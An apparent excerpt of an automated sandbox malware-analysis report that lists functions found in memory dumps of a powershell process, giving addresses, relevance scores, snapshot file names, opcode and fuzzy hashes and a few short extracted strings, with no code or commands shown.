                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {Yzn^$Yzn^
                                                                      • API String ID: 0-4060442550
                                                                      • Opcode ID: 3a54b2f65432598eeab1a951c0ec275db7eac9ac3c744eff59f09a806e0630e1
                                                                      • Instruction ID: 4a62941f07a0cc8c2ceb0a1f49caaa2a5cfb8327642c1b5f4f6bc9a08593c529
                                                                      • Opcode Fuzzy Hash: 3a54b2f65432598eeab1a951c0ec275db7eac9ac3c744eff59f09a806e0630e1
                                                                      • Instruction Fuzzy Hash: DA915E71B406149FFB19EFB9881066E7BE2EFC4710B00899DE516AB340DF74AE058BE5
                                                                      Function 07922308 Relevance: 10.6, Strings: 8, Instructions: 634COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-1679444440
                                                                      • Opcode ID: 4d8c3cf7228beca3ad982d399f7e3f23dd6416ddee88393d2a83b35052110e40
                                                                      • Instruction ID: 10a404c74a777ab3e5b4983c01b74f44649fa7e029e07a5b57936f52cd6e0e38
                                                                      • Opcode Fuzzy Hash: 4d8c3cf7228beca3ad982d399f7e3f23dd6416ddee88393d2a83b35052110e40
                                                                      • Instruction Fuzzy Hash: D1227AB1B04326CFDB14AF68C8007AAB7FABF86218F15807AD505CB255DB75DD42C7A2
                                                                      Function 04A8E5B9 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: ae1252d0882d016ee894703e3bce30be08553ac8ff7958e3be4a05e9e843a19c
                                                                      • Instruction ID: 7c6bbcba559f43d4f6f67bf870ea0b59ce34e93b4d511eb12b2d2979130fac07
                                                                      • Opcode Fuzzy Hash: ae1252d0882d016ee894703e3bce30be08553ac8ff7958e3be4a05e9e843a19c
                                                                      • Instruction Fuzzy Hash: DE417770A04205DFDB11EFA8D954A9EBBB2FF99304F1085A9D406AB390DB346D05CBA0
                                                                      Function 04A8E610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 1c35de8c7340246a19bd913972389a265ed0d25bbeaf5fbbe2861414a493ca62
                                                                      • Instruction ID: 349f88dbc2902fb2ec11c2130e8094e77b7485e52338b4dbc111452d9d9e2b62
                                                                      • Opcode Fuzzy Hash: 1c35de8c7340246a19bd913972389a265ed0d25bbeaf5fbbe2861414a493ca62
                                                                      • Instruction Fuzzy Hash: D2418870A00205DFDB11EF79D854A9EBBF2FF9A304F1485A9D406AB391DB34AD01CBA1
                                                                      Function 04A8E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 064b0c4839f973975f30bdd79469c8f857acbc3acd1c9e970e1e9090a9f04bfc
                                                                      • Instruction ID: fb2ff3c53673ce31004309e5529764a1775925ac6996f78d0190a7cf0d4180c5
                                                                      • Opcode Fuzzy Hash: 064b0c4839f973975f30bdd79469c8f857acbc3acd1c9e970e1e9090a9f04bfc
                                                                      • Instruction Fuzzy Hash: FF317474A00605DFDB14EF69D994A9EBBF2FF98204F108568D416AB390CB34AD42CFA0
                                                                      Function 07923CE8 Relevance: .6, Instructions: 586COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f70eecc943beba5563d48c2d00576279d8617c81cab81bba3dc47f2fe608aaa4
                                                                      • Instruction ID: 550e4595d77279b3a44922ac51e4dd05cc042c09185f9ce941237a74fceaae25
                                                                      • Opcode Fuzzy Hash: f70eecc943beba5563d48c2d00576279d8617c81cab81bba3dc47f2fe608aaa4
                                                                      • Instruction Fuzzy Hash: 3412BEF07043659FDB25AB68980076ABBBAAFC2218F14807AC501CF256DF79CC47D7A1
                                                                      Function 04A8E7B8 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09d824b59bc25d4bf51a1386dc038311b36c2369f2218fff877b2e913b71e7ed
                                                                      • Instruction ID: ce298221148d71d29df88e5058af0671d7f224a9bb5ae24d9058ec012a47c85b
                                                                      • Opcode Fuzzy Hash: 09d824b59bc25d4bf51a1386dc038311b36c2369f2218fff877b2e913b71e7ed
                                                                      • Instruction Fuzzy Hash: EB914C74B10224DFDB14EF69D55466EBBF6EF88610B2580ADE806EB351DF70AC41CB90
                                                                      Function 04A829F0 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81ba6e2722832834b441cc53a7e9d3e4d09bb51d7a472c36ad2e26d44699fd2e
                                                                      • Instruction ID: b2bf5104e750c86283e8892f0d9f15c27f451d1e0c200db90217d4719821d9c3
                                                                      • Opcode Fuzzy Hash: 81ba6e2722832834b441cc53a7e9d3e4d09bb51d7a472c36ad2e26d44699fd2e
                                                                      • Instruction Fuzzy Hash: 15918B75A006058FCB15CF59C494ABAFBB1FF88310B248699D915AB361C736FC91CFA0
                                                                      Function 04A8BAB0 Relevance: .2, Instructions: 157COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db50eb14c2e0eb3419c20c03451791e4bd48c35642220a655764daac0fff0eae
                                                                      • Instruction ID: f96c930d6319a6cc8e2d88db4ae6c9995e48dc82c7ae54b9d519fb13494b88ea
                                                                      • Opcode Fuzzy Hash: db50eb14c2e0eb3419c20c03451791e4bd48c35642220a655764daac0fff0eae
                                                                      • Instruction Fuzzy Hash: E86128B1E012489FDB14DFA9D584B8DBFF1EF98310F158069E819AB355EB70A845CB60
                                                                      Function 04A87740 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12613390f07e9e4aeea04d82cf3ea4098f4cf21e75dee3418113f26e509648e4
                                                                      • Instruction ID: e51fea7b87dc49e385072601197464be722eb69bed00c37d97bc400009e25f35
                                                                      • Opcode Fuzzy Hash: 12613390f07e9e4aeea04d82cf3ea4098f4cf21e75dee3418113f26e509648e4
                                                                      • Instruction Fuzzy Hash: BC51C139704205DFE705EB65DC44A2A77EAEFC9214F2584AED409CB352EB31EC41CBA0
                                                                      Function 04A8BAC0 Relevance: .2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea717e509410722a186587949205ebd8a1255a3d743845450bd4dd00d87de14b
                                                                      • Instruction ID: 20d3f356ad965c2a3ffd2fd9c7079a909d72d25c2b77621e9d4e8abf269c6767
                                                                      • Opcode Fuzzy Hash: ea717e509410722a186587949205ebd8a1255a3d743845450bd4dd00d87de14b
                                                                      • Instruction Fuzzy Hash: 246126B1E00248DFDB14DFA9D584B9DBBF1EF98310F15816AE819AB354EB70AD41CB60
                                                                      Function 04A8E419 Relevance: .1, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d8ae2d1a0ca8937750d240b4101b1118c5bb97149f130524805327296ce9c5a
                                                                      • Instruction ID: 5d99599d6f7cb8daf9b012efc2adf3cda1156b6d8314bdf16e22bbe6658bc56b
                                                                      • Opcode Fuzzy Hash: 4d8ae2d1a0ca8937750d240b4101b1118c5bb97149f130524805327296ce9c5a
                                                                      • Instruction Fuzzy Hash: 63515E74B00305CFDB14EF68C484A2A7BE6EF8921475585ADE44ACF3A6EBB4EC418F51
                                                                      Function 04A8E428 Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49c2ed5ac0660bcb8af05139a2aefea0ca289bbadb1318e039f7449e3d4a4603
                                                                      • Instruction ID: ab0a0b8242ba5f2c0052a1c4b5b393cc9ce6f230b9e71686456580dcfe6fd9ef
                                                                      • Opcode Fuzzy Hash: 49c2ed5ac0660bcb8af05139a2aefea0ca289bbadb1318e039f7449e3d4a4603
                                                                      • Instruction Fuzzy Hash: FB411B74B00205CFEB14EF6CC594A2AB7E6EFC821475585ACE44ACF365EBB4EC418B91
                                                                      Function 07923CCC Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ac006aef0427b4672ec7073ec4bc1481ea02829595d33f8fffbe3c81971b5a4
                                                                      • Instruction ID: caf6e0df567b3ae5944573d00016d17ceb762054e2b9e73f2302dde535c76dbe
                                                                      • Opcode Fuzzy Hash: 9ac006aef0427b4672ec7073ec4bc1481ea02829595d33f8fffbe3c81971b5a4
                                                                      • Instruction Fuzzy Hash: 45413EF0B04222DFCB25AF24C4407AAB7ABAF4520CF1480A5C9049F25ADB3DDD4BDB61
                                                                      Function 04A86FE0 Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 832e7b9f06db0c51847aa99a4bf7ff962b728e6563c096137293ae335f2dfd12
                                                                      • Instruction ID: 34ec7de5fda4e28cc1434947ecf95e6e888f88275a40b01d790c94d5a2da0a95
                                                                      • Opcode Fuzzy Hash: 832e7b9f06db0c51847aa99a4bf7ff962b728e6563c096137293ae335f2dfd12
                                                                      • Instruction Fuzzy Hash: 55413D38B042048FEB15EFA4C858AADBBF1EF8D315F245099D406AB391DB35AD41CB61
                                                                      Function 04A86FB0 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7c5965751e4b4424c1991e4d4d57ce6465e281886fd3e671826f740232a13ad
                                                                      • Instruction ID: bece5b687fd8342664860ea0d8d8ab5425d517a8002276f30a4d3434414b2f56
                                                                      • Opcode Fuzzy Hash: e7c5965751e4b4424c1991e4d4d57ce6465e281886fd3e671826f740232a13ad
                                                                      • Instruction Fuzzy Hash: 89414D387082558FDB15DFA8D858AAEBBF1EF89210F2450ADD445EB3A2CB319C41CB61
                                                                      Function 04A82B00 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72c98524510e45d909ef2947ac39413e8e269c51fd34cc8c6625ff45a8de4eb6
                                                                      • Instruction ID: a39dab7ac263e74278088f83e8633c04fcd99ad2a59140ce38803a741a329b0a
                                                                      • Opcode Fuzzy Hash: 72c98524510e45d909ef2947ac39413e8e269c51fd34cc8c6625ff45a8de4eb6
                                                                      • Instruction Fuzzy Hash: 314138B5A006059FCB09DF59C598ABAF7B1FF48310B1185A9D915AB364C732FC91CFA0
                                                                      Function 04A8C388 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8804fa4e9fd9a08563faafbebbd5274ef89f09f468ab7dd9bd24c8801e52f497
                                                                      • Instruction ID: 69ac93ea29291a7fe94ed8ff9e0502c1618cbe9062562af43a88500230aa12f1
                                                                      • Opcode Fuzzy Hash: 8804fa4e9fd9a08563faafbebbd5274ef89f09f468ab7dd9bd24c8801e52f497
                                                                      • Instruction Fuzzy Hash: DA31A0313006009FE715EB78D844B9EB7A6FFC9265F008679D50ACB361DFB1A845CBA1
                                                                      Function 04A8E48A Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9640f42830e8178e0907d3ebea1e06ae14c5b4e640b38557fa64feed9dac6f71
                                                                      • Instruction ID: d03b7be7a4c5ac9020e24d10e8a7af1823e1f15371e83ebbf1d4c19939ab3f3a
                                                                      • Opcode Fuzzy Hash: 9640f42830e8178e0907d3ebea1e06ae14c5b4e640b38557fa64feed9dac6f71
                                                                      • Instruction Fuzzy Hash: 11313974B00305CFEB14EF68C584A2AB7E6EF88214755C4ADE44ACF365EBB4ED418B51
                                                                      Function 04A8AE60 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c07a1bb26ecb8e372d7f6e3a13e07b363ca33d665d5879cb50fd3ebeec17f4d3
                                                                      • Instruction ID: 68d18c398e8cd3cd7a6aab73097efa3ec6097b560f213b61951ce7d446caaddb
                                                                      • Opcode Fuzzy Hash: c07a1bb26ecb8e372d7f6e3a13e07b363ca33d665d5879cb50fd3ebeec17f4d3
                                                                      • Instruction Fuzzy Hash: 57316D70E006089FDB14EFA9D5947AE7BF6EF89300F11806EE405EB390EA74AC418F61
                                                                      Function 04A8AD28 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ead71335332597f5e6d0af7b95c64719ce5e4fc5a945eaf3e94794b0cb862f0
                                                                      • Instruction ID: 835c6783c44e31be363febd4e07c998c14ebeee23aa4fa3f83da14dcb2d09d95
                                                                      • Opcode Fuzzy Hash: 3ead71335332597f5e6d0af7b95c64719ce5e4fc5a945eaf3e94794b0cb862f0
                                                                      • Instruction Fuzzy Hash: 583163B4A002049FFB05EFA4D954AAE7BB6EF85300F1184ADD515AB395DE38AD00CF61
                                                                      Function 04A8AE70 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d999bfff07e2c907cfeaee2fe7ee61ca60dffcc3e2e570a2971893d6ebbe415e
                                                                      • Instruction ID: 80006f58176bae14449637c36f97c096875fb1355dddc78dabc1db12fc19cff5
                                                                      • Opcode Fuzzy Hash: d999bfff07e2c907cfeaee2fe7ee61ca60dffcc3e2e570a2971893d6ebbe415e
                                                                      • Instruction Fuzzy Hash: 1A314F70E016099FDB14EFA9C5947AE7AF6EF89300F11806EE405EB394EA749C418B50
                                                                      Function 04A8DFC0 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c53ab7550a26d9f364041e46e85ff6721925e1c6adeba21bb86931a0ce3cd99
                                                                      • Instruction ID: 774e005d26191cbf2381e2d90cd304577b60643f4edb65ab10ff1f6a24461e0b
                                                                      • Opcode Fuzzy Hash: 2c53ab7550a26d9f364041e46e85ff6721925e1c6adeba21bb86931a0ce3cd99
                                                                      • Instruction Fuzzy Hash: 01313634A002048FDB14EF68D058A9EBBF2FF9D224F1545A9D406EB360DB71AC42CB95
                                                                      Function 04A8AF98 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1cf128d75687ccc547d7dcaa51008d88f9204b4fc428d162830397810a3ffa6
                                                                      • Instruction ID: 680fbd091747d382b5ac2203cba0118601b0e9b7a87bc99293a58154c8283869
                                                                      • Opcode Fuzzy Hash: e1cf128d75687ccc547d7dcaa51008d88f9204b4fc428d162830397810a3ffa6
                                                                      • Instruction Fuzzy Hash: 4321B271A043588FDB14EFAAD40079EBBF6EF89320F14846ED419E7340CB75A945CBA5
                                                                      Function 04A8AD38 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f5c4fe3b47efafa06cc71d95b6dfdf14ccec1c346f8b76426f82651def0fcfe
                                                                      • Instruction ID: 254ada8f6904f8cdd44b218a2f73249d87e264b00e2ec17e661ce65dc516cfdc
                                                                      • Opcode Fuzzy Hash: 7f5c4fe3b47efafa06cc71d95b6dfdf14ccec1c346f8b76426f82651def0fcfe
                                                                      • Instruction Fuzzy Hash: FA3130B4E002099FFB04EFA4D954ABE7BB6FF84304F118469D515AB395DE35AD018FA0
                                                                      Function 04A8DFD0 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb8cc44684a6dccf6f25a37b1fca7dce8c900a1f549827d3f436909e8c3b02aa
                                                                      • Instruction ID: 9299b4a9760ab6a855b5529058c721fdb699bbe822dbdb40314bae0952188af5
                                                                      • Opcode Fuzzy Hash: bb8cc44684a6dccf6f25a37b1fca7dce8c900a1f549827d3f436909e8c3b02aa
                                                                      • Instruction Fuzzy Hash: DD313A74A002048FDB14EF68D458A9EBBF2FF8C214F14456DD406E7750DB75AC42CB95
                                                                      Function 07922700 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c16304df3cab39a4413cf5ae3b815ce94cb589e439331048f9f1a4775c8ccb27
                                                                      • Instruction ID: b9d6e827747da31fce2300c472667dcc6badda47f1060e128fa57e37026675a6
                                                                      • Opcode Fuzzy Hash: c16304df3cab39a4413cf5ae3b815ce94cb589e439331048f9f1a4775c8ccb27
                                                                      • Instruction Fuzzy Hash: D221B1B4A08226DFDB24FF59C440BA577FCBB05319F06C066D8048B358C778E946EB61
                                                                      Function 04A893F0 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2a5be8e97da0fc674ea829e78d089e57f864750fef4ca593b178e414086948a
                                                                      • Instruction ID: 8d61eee1a46d9d007ad9f00fda7d220633c278c752dad838f290d6a202bb7a87
                                                                      • Opcode Fuzzy Hash: c2a5be8e97da0fc674ea829e78d089e57f864750fef4ca593b178e414086948a
                                                                      • Instruction Fuzzy Hash: C331CEB0A057448FDB24DF6AC08839AFFF6EF89310F28806DC81D9B215D7746485CB61
                                                                      Function 04A1F3D8 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1805795030.0000000004A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a1d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12da8009cf2110e4f14d846bf58418ea0177241af5f2fd73fb5fa2c568dc2078
                                                                      • Instruction ID: df230be77f5734e37b42188192d0ec81c4e3b0fe253e9934082cb9faee883d09
                                                                      • Opcode Fuzzy Hash: 12da8009cf2110e4f14d846bf58418ea0177241af5f2fd73fb5fa2c568dc2078
                                                                      • Instruction Fuzzy Hash: 0B21C476604380EFDB05DF50D9C0B26BB76FB88314F24C5ADF9494A266C336E456CBA2
                                                                      Function 04A1F02C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1805795030.0000000004A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a1d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 90e97176441f43e91f12ff22c8a1b9c2f30a55a2ee0afcd3f06e036e822f8cfe
                                                                      • Instruction ID: ae6728877e6f76f8e838c2d9a3a0622de17d11cadade733722a4d0ceb09165b0
                                                                      • Opcode Fuzzy Hash: 90e97176441f43e91f12ff22c8a1b9c2f30a55a2ee0afcd3f06e036e822f8cfe
                                                                      • Instruction Fuzzy Hash: 9C214975604380DFEB14DF10D9C0B16BBA1FB84314F24C56DEA0A4B266D336E446CA61
                                                                      Function 04A89400 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f89b442dc4d7bcde8da892ba3c82ea33f69ff42063e381c7d85e66d36bbf69e4
                                                                      • Instruction ID: bba83bcd2d57a05071bdf2a532b5f8596f061ec7fe0c388ea1dc9c08514774d0
                                                                      • Opcode Fuzzy Hash: f89b442dc4d7bcde8da892ba3c82ea33f69ff42063e381c7d85e66d36bbf69e4
                                                                      • Instruction Fuzzy Hash: 75219CB0A017448FEB64DF6AC0883DAFFF6EB88310F28C41DC81D97245D6B46485CB61
                                                                      Function 04A8767C Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
